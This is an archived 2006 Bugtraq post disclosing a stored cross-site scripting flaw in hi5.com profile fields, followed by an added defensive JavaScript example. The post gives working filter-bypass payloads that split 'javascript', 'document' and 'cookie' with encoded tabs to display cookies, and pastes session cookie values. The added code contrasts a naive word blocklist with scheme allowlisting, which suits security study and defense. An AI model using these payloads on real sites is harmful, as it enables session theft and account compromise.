Open Source and information security mailing list archives
Message-ID: <20060613082029.28254.qmail@securityfocus.com>
Date: 13 Jun 2006 08:20:29 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: hi5.com - XSS with cookie disclosure


hi5.com

Homepage:
http://www.hi5.com

Affected files:

Input boxes of editing your profile.

XSS Vuln with cookie disclosure:

It seems hi5.com allows a lot of HTML tags to be used on their site, but they will filter out words like javascript, applet, and iframe tags (which is to be expected). Here's a link to the page that lists all the tags they will and won't allow:

http://hi5.com/friend/account/html_tips.html

How do we get around this? Well, to get around the javascript filtering we use an embedded encoded tab to break up the javascript word. Below are a few examples of it. For PoC try putting this in your profile. (I used the Hometown box, all should work though):

<IMG SRC="jav&#x09;ascript:alert('XSS');">

or

<DIV STYLE="background-image: url(jav&#x09;ascript:al&#x09;ert('XSS'))">

Why do we have to use an embedded encoded tab in the word "alert" in a div tag and not an img tag? I have no idea!

Screenshots:
http://www.youfucktard.com/xsp/hi52.jpg
http://www.youfucktard.com/xsp/hi53.jpg

WHERE'S THE COOKIE?!?!

Now let's change that so we can show our cookie data. Since they don't seem to allow the words document and cookie, let's use the same method above to break it up. Try putting:

Popup alert:
<IMG SRC="jav&#x09;ascript:alert(docu&#x09;ment.coo&#x09;kie);">

Write on screen:
<IMG SRC="jav&#x09;ascript:docu&#x09;ment.write(docu&#x09;ment.cookie);">

Our Cookie:
hi5banner_traffic_US; hi5medium_traffic_US; hi5sky_traffic_US; hi5uniqueAd2=1; hi5adcomRect; hi5adcomSky; hi5inpath=-1;hi5sp=homepage;hi5loggedIn=true;adHistoryLdr=4:1150268890485:4:1150268897936:1:1150269052890:1:1150269092966:8:1150269130139:9:1150269256989:9:1150269310562:10:1150269315812:11:1150269416327:11:1150269438591:12:1150269446349:13:1150269502289:13:1150269518708:14:1150269567146:15:1150269654968; sc=Fics:0:Ficb:0:Ficl:0; JSESSIONID=a229uu7JgBN7; K-JSESSIONID0x9882f778=6821EBA8AA2FB03B1F4D6B04A2799FED;adHistoryRct=1001:1150268898713:1001:1150269130834:1004:1150269316178:1004:1150269447018:1002:1150269519194:1002:1150269669974:1008:1150269721357:1007:1150269799646:1007:1150269971317:1010:1150270159468:1011:1150270778028:1011:1150270823873:1012:1150270950243;adHistorySky=2004:1150269046423:2004:1150269086714:2001:1150269250710:2001:1150269303450:2008:1150269409727:2007:1150269432295:2007:1150269495667:2020:1150269560927:2002:1150269648476:2002:1150269691452:2012:1150269709420:2011:1150269751737:2011:1150269785251:2014:1150270053753:2015:1150270141733
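Added example, not code from the original post or from hi5.com: the two bypasses above (the encoded tab splitting "javascript", and the same trick splitting "document" and "cookie") both work because the filter matches words in the raw, still entity-encoded markup, while the browser decodes the character references and strips tabs before it interprets the URL. The snippet below contrasts that kind of word blocklist with a check that normalizes the attribute value the way a browser does and then allows only http/https schemes. All function names, the blocklist contents and the benign sample tag are assumptions of this example; the payload strings are the ones quoted in the advisory.

```javascript
// Added example, not code from the original post or from hi5.com.
// Function names, BLOCKED_WORDS and the benign sample markup are our own
// assumptions; the payload strings are the ones quoted in the advisory.

// Decode numeric character references the way a browser does before it
// interprets an attribute value (&#x09; and &#9; both become a real tab).
function decodeCharRefs(value) {
  const fromCodePoint = (cp) =>
    cp <= 0x10ffff ? String.fromCodePoint(cp) : '\uFFFD';
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => fromCodePoint(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => fromCodePoint(parseInt(dec, 10)));
}

// Browsers drop ASCII tab, LF and CR anywhere in a URL and trim leading and
// trailing C0 controls and spaces before they look at the scheme, which is
// why "jav<TAB>ascript:" is still treated as javascript:.
function normalizeUrl(value) {
  return decodeCharRefs(value)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
}

// The kind of filter the advisory describes: a case-insensitive substring
// blocklist run over the raw (still entity-encoded) markup.
const BLOCKED_WORDS = ['javascript', 'document', 'cookie'];
function naiveWordFilterAllows(rawHtml) {
  const lower = rawHtml.toLowerCase();
  return !BLOCKED_WORDS.some((word) => lower.includes(word));
}

// Hardened check for one URL-valued attribute: normalize first, then allow
// only an explicit set of schemes. Relative URLs carry no scheme and pass.
const ALLOWED_SCHEMES = new Set(['http', 'https']);
function isSafeUrlAttribute(rawValue) {
  const url = normalizeUrl(rawValue);
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (scheme === null) return true;
  return ALLOWED_SCHEMES.has(scheme[1].toLowerCase());
}

// Pull the values a browser would treat as URLs out of a snippet: src/href
// attributes and url(...) inside inline styles. Deliberately simple; a real
// sanitizer should walk a parsed DOM rather than regex the markup.
function extractUrlValues(html) {
  const values = [];
  const attr = /\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  const cssUrl = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)]*))\s*\)/gi;
  let m;
  while ((m = attr.exec(html)) !== null) values.push(m[1] ?? m[2]);
  while ((m = cssUrl.exec(html)) !== null) values.push(m[1] ?? m[2] ?? m[3]);
  return values;
}

// Run both checks over a profile-field snippet and report what each decides.
function auditSnippet(html) {
  return {
    naiveAllows: naiveWordFilterAllows(html),
    hardenedAllows: extractUrlValues(html).every(isSafeUrlAttribute),
  };
}

// Constructed inputs: the advisory's payloads plus one benign image tag.
const SAMPLES = {
  imgTab: `<IMG SRC="jav&#x09;ascript:alert('XSS');">`,
  divTab: `<DIV STYLE="background-image: url(jav&#x09;ascript:al&#x09;ert('XSS'))">`,
  cookieAlert: `<IMG SRC="jav&#x09;ascript:alert(docu&#x09;ment.coo&#x09;kie);">`,
  benign: `<img src="http://www.hi5.com/images/logo.gif">`,
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, html] of Object.entries(SAMPLES)) {
    console.log(name, auditSnippet(html));
  }
}
```

Running it prints naiveAllows: true for all three payloads (the blocklist never sees the word it is looking for) and hardenedAllows: false for them, while the plain http image passes both. The point of the design is the order of operations: decode and strip exactly as the consumer will, and only then decide, and decide by allowlisting schemes rather than by blocklisting words.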



Screenshots:
http://www.youfucktard.com/xsp/hi54.jpg
http://www.youfucktard.com/xsp/hi55.jpg

